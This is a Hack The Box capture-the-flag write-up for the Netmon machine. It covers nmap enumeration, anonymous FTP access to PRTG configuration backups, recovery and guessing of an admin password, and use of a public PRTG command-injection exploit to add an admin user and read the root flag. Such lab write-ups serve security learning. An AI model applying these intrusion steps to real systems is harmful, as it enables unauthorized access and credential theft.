# HTB | [Netmon](https://app.hackthebox.com/machines/177)

**Author**: Nanonej

**Status:** [Rooted]

**Tags:** #Windows #Powershell #FileMisconfiguration #Web #FTP #PRTG #CodeInjection

**Vulnerabilities:** Anonymous FTP login allowed.
+ Security misconfigurations

**Rating:** Easy

## Overview

Netmon is an easy difficulty Windows box with simple enumeration and exploitation. PRTG is running, and an FTP server with anonymous access allows reading of PRTG Network Monitor configuration files. The version of PRTG is vulnerable to RCE which can be exploited to gain a SYSTEM shell.

---

## Reconnaissance

### NMAP
```console
$ nmap -sC -A -oA netmon 10.10.10.152
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-25 14:17 EST
Nmap scan report for 10.10.10.152
Host is up (0.060s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2021-11-25T19:23:01
|_  start_date: 2021-11-25T19:20:53
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 5m00s, deviation: 0s, median: 4m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.73 seconds
```

We can see that there is a http server running, so let's start with this. \
We land on the PRTG Network Monitor index page displaying a login form and a description of the software. \
Trying some basic credentials but it doesn't work.

Next let's check the FTP allow anonymous connection. \
It work!

## Vulnerability Analysis

FTP can be configured to allow anonymous connection without password.

## Exploitation

```console
$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
```

### User Flag
```console
ftp> cd /Users/Public
250 CWD command successful.
ftp> get user.txt
```

---

## Reconnaissance

We could get the user flag but not the root:
```console
ftp> cd /Users/Administrator
550 Access is denied.
```
Let's check for obvious CVE on Windows Server 2008 R2 SMB while we also enumerate safe and smb script with nmap. \
We found an RCE exploit based on several CVE and on MS17-010 and nothing with NMAP script:
```console
$ searchsploit Windows Server 2008 R2
-------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                |  Path
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                 | windows_x86-64/remote/41987.py
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ nmap -Pn --script "safe or smb-enum-*" -p 445 10.10.10.152                                                                              1 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-25 16:10 EST
Pre-scan script results:
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn:
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for 10.10.10.152
Host is up (0.036s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| unusual-port:
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| smb-mbenum:
|_  ERROR: Failed to connect to browser service: No accounts left to try
|_fcrdns: FAIL (No PTR record)
|_msrpc-enum: No accounts left to try
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| port-states:
|   tcp:
|_    open: 445
|_clock-skew: mean: 5m00s, deviation: 0s, median: 5m00s
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
| smb2-capabilities:
|   2.0.2:
|     Distributed File System
|   2.1:
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0:
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2:
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1:
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| dns-blacklist:
|   SPAM
|_    l2.apews.org - FAIL
| smb2-time:
|   date: 2021-11-25T21:16:24
|_  start_date: 2021-11-25T19:20:53
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Post-scan script results:
| reverse-index:
|_  445/tcp: 10.10.10.152
Nmap done: 1 IP address (1 host up) scanned in 78.10 seconds
```

Let's try the exploit found:
```console
$ cp /usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py .

$ python3 41987.py 10.10.10.152
[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB
[*] Exploit running.. Please wait
Traceback (most recent call last):
  File "/home/kali/Downloads/Netmon/41987.py", line 133, in <module>
    main(sys.argv[1])
  File "/home/kali/Downloads/Netmon/41987.py", line 119, in main
    data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
  File "/home/kali/Downloads/Netmon/41987.py", line 119, in <listcomp>
    data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
ConnectionResetError: [Errno 104] Connection reset by peer
```
It doesn't seem to work.

Then let's check for vulnerabilities on the web server and PRTG Network Monitor. \
The running version is `PRTG 18.1.37.13946`.
```console
$ searchsploit PRTG 18
-------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                |  Path
-------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                          | windows/webapps/46527.sh
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
There is an RCE but we need to be authenticated for that and it's for the 18.2.38 version.

Let's get back on the FTP to check if we are authorized to access PRTG files or files where we could find some credentials or informations on potential user name, etc. \
We can access `"Program Files (x86)\PRTG Network Monitor"`, so let's search on the internet where interesting PRTG data could be stored. \
We found on the forum and PRTG doc that the data files are stored in `%programdata%\Paessler\PRTG Network Monitor` so let's try to access this folder, and it's a SUCCESS!:
```console
ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
11-25-21  03:03PM       <DIR>          Configuration Auto-Backups
11-25-21  07:00PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
11-26-21  12:00AM       <DIR>          Logs (Web Server)
11-25-21  07:01PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
11-26-21  10:38AM              1721238 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
```

Next I will try to get those 3 configuration folder and check if there is a password stored in them. \
The first one got some but they are displayed as `<encrypted/>`, let's try our luck with the two others. Only encrypted ones on the second too, but on the third we got a:
```xml
<dbpassword>
  <!-- User: prtgadmin -->
  PrTg@dmin2018
</dbpassword>
```

So we head back on the website trying those, it doesn't work but it's a backup. So let's incremente the year in the password, `prtgadmin:PrTg@dmin2019` SUCCESS again! We are welcomed as `System Administrator`. \
We will try this RCE exploit then! But before, let's try to dig the exploit further. \
It is based on a Command Injection Vulnerability.

## Vulnerability Analysis

According the original article on this vulnerability disclosure, many network monitoring tools include the capability of running external programs as part of a “notification” as a feature and PRTG is no exception. However PRTG implemented a security control around the notifications feature, but one of the included demo scripts was vulnerable to command injection.

## Exploitation

We get the cookie `OCTOPUS1813713946` and use the script with it.
It create a new admin user `pentest:P3nT3st!` with which we can log in on SMB.

We could also exploit the original code injection and create a reverse shell.

### Root Flag

We can now acces the folder `Users\Administrator` in which there is the flag located in `"C:\Users\Administrator\Desktop\root.txt"`.

---

## References

- [Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)](https://www.exploit-db.com/exploits/41987)
- [How and where does PRTG store its data?](https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data)
- [PRTG < 18.2.39 Command Injection Vulnerability](https://web.archive.org/web/20210308021046/https://www.codewatch.org/blog/?p=453)
- [PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution](https://www.exploit-db.com/exploits/46527)
